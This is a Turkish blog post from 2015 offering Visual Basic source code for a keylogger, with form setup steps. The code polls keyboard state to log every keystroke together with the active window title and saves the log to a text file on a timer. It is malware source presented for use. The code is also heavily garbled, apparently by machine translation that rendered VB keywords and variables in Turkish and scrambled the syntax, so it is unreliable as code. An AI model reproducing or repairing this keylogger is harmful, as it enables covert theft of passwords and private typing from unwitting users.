31 Ağustos 2015 Pazartesi

KEYLOGGER KODLARİ


 
evet Arkdaşlar Keylogger kodlarını vercem

forma 2 textbox açın (text1-text2)

2 tanede timer ekleyin (timer1 - 2)

Metin1'in çoklu-satır özelliği true olsun

timer1 "" olsun 5 zamanı

2 zamnı "1000" (1)sn olsun ıse


evet bu kadar aşağıdaki kodları kodları olduğu gibi kod penceresini yapıştırın !
Kod:
Özel Function GetAsyncKeyState Lib "" (ByVal vKey As Long) Tamsayı user32 İlan
Özel Function GetKeyState Lib "" (ByVal nVirtKey Olarak Uzun) Tamsayı user32 İlan
İşlev Ancak İlan Lib "" () Olarak Uzun user32 özel
Özel Function GetWindowText Lib "" Diğer "" (Uzun, String, ByVal cch As Long, ByVal Olarak ByVal lpString thread) Olarak Uzun GetWindowTextA user32 İlan
Özel İlan Fonksiyonu GetWindowTextLength" Alias" (ByVal fonksiyonu Olarak Uzun) sürece "GetWindowTextLengthA "user32 Lib
Özel Function GetComputerName Lib "" Diğer "" (String, ByVal nSize Olarak doğrulamasını Olarak Uzun) sürece GetComputerNameA kernel32 İlan

Özel LastWindow Olarak Dize
Özel LastHandle Sürece
Uzun Olarak özel dKey(255)
Özel Sabit = VK_SHİFT &H10
Özel Sabit = VK_CTRL &H11
Özel Sabit = VK_ALT &H12
Özel Sabit = VK_CAPİTAL &H14
String Olarak Özel ChangeChr(255)
Özel AltDown Boolean

()Private Sub Form_Load


On Error Resume Next

= "[PageUp]"ChangeChr(33)
= "[PageDown]"ChangeChr(34)
(35) = "End"ChangeChr
(36) = ChangeChr "[Home]"

(45) = ChangeChr "[Ekleme]"
= "[Delete]"ChangeChr(46)

ChangeChr(48) = "="
(49) = ChangeChr "!"
(50) = ChangeChr "'"
ChangeChr(51) = "^"
ChangeChr(52) = "+"
ChangeChr(53) = "%"
ChangeChr(54) = "&"
ChangeChr(55) = "/"
(56) = ChangeChr "("
(57) = ChangeChr ")"

ChangeChr(186) = "ş"
ChangeChr(187) = "="
(188) = ChangeChr ","
ChangeChr(189) = "-"
(190) = ChangeChr "."
ChangeChr(191) = "ö"

ChangeChr(219) = "ğ"
ChangeChr(220) = "ç"
ChangeChr(221) = "ü"
ChangeChr(222) = "ben"


ChangeChr(86) = "Ş"
ChangeChr(87) = "+"
(88) = ChangeChr ";"
ChangeChr(89) = "_"
(90) = ChangeChr ":"
(91) = ChangeChr "?"

ChangeChr(119) = "Ğ"
ChangeChr(120) = "Ç"
ChangeChr(121) = "Ü"
ChangeChr(122) = "Ben"


ChangeChr(96) = "0"
ChangeChr(97) = "1"
ChangeChr(98) = "2"
ChangeChr(99) = "3"
ChangeChr(100) = "4"
ChangeChr(101) = "5"
ChangeChr(102) = "6"
ChangeChr(103) = "7"
ChangeChr(104) = "8"
ChangeChr(105) = "9"
ChangeChr(106) = "*"
ChangeChr(107) = "+"
ChangeChr(109) = "-"
(110) = ChangeChr "."
ChangeChr(111) = "/"

(192) = ChangeChr""""
ChangeChr(92) = "ben"
End Sub

Fonksiyon TypeWindow()
Dim Olarak Uzun Kolu
Dim sürece textlen
Dim WindowText Olarak Dize

= Ancak İdare
LastHandle = Tanıtıcı
= GetWindowTextLength(Handle) + 1 textlen

WindowText = Boşluk(textlen)
svar = GetWindowText(Handle, WindowText, textlen)
WindowText = Left(Len(WindowText) - 1 WindowText)

WindowText <> LastWindow Sonra
"" Then Text1 = Text1 & vbCrLf & vbCrLf Metin1 < >
Text1 = Text1& "==============================" & vbCrLf & WindowText & vbCrLf& "==============================" & vbCrLf
= WindowText LastWindow
Eğer Son
End Function

Private Sub Timer1_Timer()

'ne zaman alt kadar
GetAsyncKeyState(VK_ALT) = 0 Ve AltDown = True then
AltDown = False
Text1 = Text1 & ""
Eğer Son

'a-z-Z
Ben = Asc (""), Asc("Z")
Eğer GetAsyncKeyState(i) = -32767 Sonra
TypeWindow

0 < GetAsyncKeyState(VK_SHİFT)
0 > GetKeyState(VK_CAPİTAL)
Text1 = Text1 & LCase (>>(ben))
Exit Sub
Başka
Text1 = Text1 & UCase(Chr(i))
Exit Sub
Eğer Son
Başka
0 > GetKeyState(VK_CAPİTAL)
Text1 = Text1 & UCase(Chr(i))
Exit Sub
Başka
Text1 = Text1 & LCase (>>(ben))
Exit Sub
Eğer Son
Eğer Son

Eğer Son
Gelecek

'1234567890)(*&^%$#@!
Ben = 48 57
Eğer GetAsyncKeyState(i) = -32767 Sonra
TypeWindow

0 < GetAsyncKeyState(VK_SHİFT)
Text1 = Text1 & ChangeChr(ben)
Exit Sub
Başka
Text1 = Text1 & Komisyonuna(ben)
Exit Sub
Eğer Son

Eğer Son
Gelecek


';=,-./
= 186 ben 192
Eğer GetAsyncKeyState(i) = -32767 Sonra
TypeWindow

0 < GetAsyncKeyState(VK_SHİFT)
Text1 = Text1 & ChangeChr(ı - 100)
Exit Sub
Başka
Text1 = Text1 & ChangeChr(ben)
Exit Sub
Eğer Son

Eğer Son
Gelecek


'[]'
= 219 için 222
Eğer GetAsyncKeyState(i) = -32767 Sonra
TypeWindow

0 < GetAsyncKeyState(VK_SHİFT)
Text1 = Text1 & ChangeChr(ı - 100)
Exit Sub
Başka
Text1 = Text1 & ChangeChr(ben)
Exit Sub
Eğer Son

Eğer Son
Gelecek

'num pad
= 96 için ben 111
Eğer GetAsyncKeyState(i) = -32767 Sonra
TypeWindow

GetAsyncKeyState(VK_ALT) < 0 Ve AltDown = False then
AltDown = True
Text1 = Text1 & ""
Başka
GetAsyncKeyState(VK_ALT) >= 0 Ve = True Sonra AltDown eğer
AltDown = False
Text1 = Text1 & ""
Eğer Son
Eğer Son

Text1 = Text1 & ChangeChr(ben)
Exit Sub
Eğer Son
Gelecek

'uzay
Eğer GetAsyncKeyState(32) = -32767 Sonra
TypeWindow
Text1 = Text1 & " "
Eğer Son

'girin
Eğer GetAsyncKeyState(13) = -32767 Sonra
TypeWindow
Text1 = Text1 & vbCrLf
Eğer Son

'Geri Al
Eğer GetAsyncKeyState(8) = -32767 Sonra
TypeWindow
Text1 = Text1 & " "
Eğer Son

'SOL OK
Eğer GetAsyncKeyState(37) = -32767 Sonra
TypeWindow
Text1 = Text1 & ""
Eğer Son

'YUKARI OK
Eğer GetAsyncKeyState(38) = -32767 Sonra
TypeWindow
Text1 = Text1 & ""
Eğer Son

'sağ ok
Eğer GetAsyncKeyState(39) = -32767 Sonra
TypeWindow
Text1 = Text1 & ""
Eğer Son

'aşağı ok
Eğer GetAsyncKeyState(40) = -32767 Sonra
TypeWindow
Text1 = Text1 & ""
Eğer Son

'sekmesi
Eğer GetAsyncKeyState(9) = -32767 Sonra
TypeWindow
Text1 = Text1 & " [Tab] "
Eğer Son

'kaçış
Eğer GetAsyncKeyState(27) = -32767 Sonra
TypeWindow
"Esc "Text1 = Text1 &
Eğer Son

'eklemek, silmek
Ben = 45 46
Eğer GetAsyncKeyState(i) = -32767 Sonra
TypeWindow
Text1 = Text1 & ChangeChr(ben)
Eğer Son
Gelecek

çünkü, Sonraki sayfa, son sayfa home
= 33 ben 36
Eğer GetAsyncKeyState(i) = -32767 Sonra
TypeWindow
Text1 = Text1 & ChangeChr(ben)
Eğer Son
Gelecek

'sol tıklayın
Eğer GetAsyncKeyState(1) = -32767 Sonra
Eğer (LastHandle = Ancak) Ve Sonra Da <> 0 LastHandle
Text1 = Text1 & " "
Eğer Son
Eğer Son

End Sub
Private Sub Timer2_Timer()
On Error Resume Next


Metin2.Metin = "c:Keylogger.txt"
Açık Metin2.Metin #1 Olarak Çıktı
Print #1, Text1.Metin;
Close #1
End Sub

Hiç yorum yok:

Yorum Gönder